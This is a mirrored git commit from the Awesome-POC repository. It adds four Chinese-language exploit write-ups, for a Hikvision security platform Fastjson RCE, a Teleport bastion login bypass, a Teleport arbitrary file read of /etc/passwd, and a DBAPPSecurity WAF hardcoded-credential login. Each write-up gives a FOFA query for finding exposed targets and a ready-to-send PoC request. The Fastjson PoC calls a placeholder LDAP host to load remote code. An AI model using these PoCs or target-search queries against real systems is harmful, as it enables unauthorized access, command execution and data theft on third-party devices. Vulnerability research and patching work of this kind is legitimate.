mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
更新漏洞库:网络设备漏洞/
This commit is contained in:
parent
1cead7bb0b
commit
787d4d4465
34
网络设备漏洞/HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞.md
Normal file
34
网络设备漏洞/HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞.md
Normal file
@ -0,0 +1,34 @@
|
||||
# HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
HIKVISION 综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞,攻击者通过漏洞可以执行任意命令获取服务器权限
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
HIKVISION 综合安防管理平台
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="HIKVISION-综合安防管理平台"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
POST /bic/ssoService/v1/applyCT
|
||||
Content-Type: application/json
|
||||
|
||||
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
|
||||
```
|
||||
|
||||

|
||||
37
网络设备漏洞/Teleport堡垒机 do-login 任意用户登录漏洞.md
Normal file
37
网络设备漏洞/Teleport堡垒机 do-login 任意用户登录漏洞.md
Normal file
@ -0,0 +1,37 @@
|
||||
# Teleport堡垒机 do-login 任意用户登录漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Teleport堡垒机存在任意用户登录漏洞,攻击者通过构造特殊的请求包可以登录堡垒机获取其他系统权限
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
Teleport Version <= 20220817
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="TELEPORT堡垒机"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC, captcha参数为验证码
|
||||
|
||||
```
|
||||
POST /auth/do-login
|
||||
|
||||
args={"type":2,"username":"admin","password":null,"captcha":"ykex","oath":"","remember":false}
|
||||
```
|
||||
|
||||

|
||||
|
||||
code 返回 0 即为成功,再访问 /dashboard 获取管理员权限
|
||||
|
||||

|
||||
31
网络设备漏洞/Teleport堡垒机 get-file 后台任意文件读取漏洞.md
Normal file
31
网络设备漏洞/Teleport堡垒机 get-file 后台任意文件读取漏洞.md
Normal file
@ -0,0 +1,31 @@
|
||||
# Teleport堡垒机 get-file 后台任意文件读取漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Teleport堡垒机 get-file接口存在后台任意文件读取漏洞,攻击者利用任意用户登录漏洞后可以获取后台权限,再进一步利用任意文件读取获取服务器上的敏感文件
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
Teleport Version <= 20220817
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="TELEPORT堡垒机"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
登录后使用POC验证
|
||||
|
||||
```
|
||||
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
|
||||
```
|
||||
|
||||

|
||||
45
网络设备漏洞/安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞.md
Normal file
45
网络设备漏洞/安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞.md
Normal file
@ -0,0 +1,45 @@
|
||||
# 安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
安恒 明御WEB应用防火墙
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="安恒信息-明御WAF"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
/report.m?a=rpc-timed
|
||||
```
|
||||
|
||||

|
||||
|
||||
再访问主页面跳转配置页面
|
||||
|
||||

|
||||
|
||||
发送请求包配置系统SSH等
|
||||
|
||||
```
|
||||
POST /system.m?a=reserved
|
||||
|
||||
key=!@#dbapp-waf-dev-reserved#@!
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user